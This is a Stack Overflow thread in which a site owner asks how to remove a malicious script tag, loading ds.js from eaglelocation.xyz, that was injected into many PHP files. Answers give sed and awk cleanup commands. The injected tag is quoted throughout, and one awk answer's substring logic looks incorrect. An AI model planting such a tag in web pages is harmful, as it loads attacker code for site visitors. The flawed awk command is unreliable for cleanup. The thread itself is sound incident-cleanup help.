0

Someone has managed to infect a lot of my files with the following code:

<script type='text/javascript' async src='https://eaglelocation.xyz/ds.js&'></script>

The script tag has been prepended to a lot of .php files. I'm trying to use the sed command to fix these files. My pattern is not matching for some reason even though in online regular expression testers it works. This is what I have:

sed '/<script type=\'text\/javascript\' async src=\'https:\/\/eaglelocation.xyz\/ds.js&\'\>\<\/script>/d' index.php

Just for more information the script tag has been prepended right at the top of the file and is also connected to the opening php tag like so </script><?php

Aayush
  • 3,079
  • 10
  • 49
  • 71
  • 1
    I guess a full restore from source control or at least a backup would be preferable. They badies might have pocked some more holes. – wp78de Jun 24 '19 at 22:02
  • 3
    You can't escape quotes inside single-quoted strings. See https://stackoverflow.com/questions/1250079/how-to-escape-single-quotes-within-single-quoted-strings – Barmar Jun 24 '19 at 22:11
  • A does-it-all command could look like this: `grep -rl " – wp78de Jun 24 '19 at 22:25

2 Answers2

1

There are multiple issues with your sed usage:

  • You mix single quotes as pattern delimiters and as a parts of JS code. Use double quotes as pattern wrappers.
  • You escape too much inside the pattern. To make it easier to comprehend, I use % instead of / as a pattern delimiter
  • As malicious code may be placed in the same line as a good code, I don't use d sed command, but s (replace) with -i (in place)

See below:

$ cat test.php
<script type='text/javascript' async src='https://eaglelocation.xyz/ds.js&'></script><?php
echo '<p>Hello World</p>'; ?>
$ sed -i  "s%<script type='text/javascript' async src='https://eaglelocation.xyz/ds.js&'></script>%%"  test.php
$ cat test.php
<?php
echo '<p>Hello World</p>'; ?>
mrzasa
  • 22,895
  • 11
  • 56
  • 94
  • Tried this, it outputs the file with the script tag still intact. I don't think it is matching. Just for your information the script tag has been prepended right at the top of the file and is also connected to the opening php tag like so php – Aayush Jun 25 '19 at 06:19
  • Please, see the new version of my answer. – mrzasa Jun 25 '19 at 07:51
1

sed doesn't understand literal strings (see Is it possible to escape regex metacharacters reliably with sed) but awk does. If it's on a single line then to remove the string:

<script type='text/javascript' async src='https://eaglelocation.xyz/ds.js&'></script>

from a file is this:

awk '
    BEGIN { str=ARGV[1]; ARGV[1]="" }
    s=index($0,str) { $0=substr($0,s-1) substr($0,s+length(str)) }
1' "<script type='text/javascript' async src='https://eaglelocation.xyz/ds.js&'></script>" file

To make that change to all .php files using GNU awk for "inplace" editing would be:

find . -type f -name '*.php' -exec \
awk -i inplace '
    BEGIN { str=ARGV[1]; ARGV[1]="" }
    s=index($0,str) { $0=substr($0,s-1) substr($0,s+length(str)) }
1' "<script type='text/javascript' async src='https://eaglelocation.xyz/ds.js&'></script>" {} +
Ed Morton
  • 188,023
  • 17
  • 78
  • 185
  • I'm not familiar with awk. awk: cmd. line:3: s=index($0,str) { $0=substr($0,s-1) substr($0,s+length(str) } – Aayush Jun 25 '19 at 06:16
  • I also tried the second command to run on the a single file by changing the *.php to index.php like so find . -type f -name 'index.php' -exec \ awk -i inplace 'BEGIN { str=ARGV[1]; ARGV[1]="" } s=index($0,str) { $0=substr($0,s-1) substr($0,s+length(str) } 1' "" {} + – Aayush Jun 25 '19 at 06:25
  • I got: find: ' awk': No such file or directory – Aayush Jun 25 '19 at 06:25
  • I fixed the missing `)` in the script. That's one problem with not providing sample input/output in your question for us to test against - then we don't have anything to test against so you get untested scripts posted in our answers. If you just execute the `find` command I posted as-is then you won't get an error message of `find: ' awk': No such file or directory`. – Ed Morton Jun 25 '19 at 10:17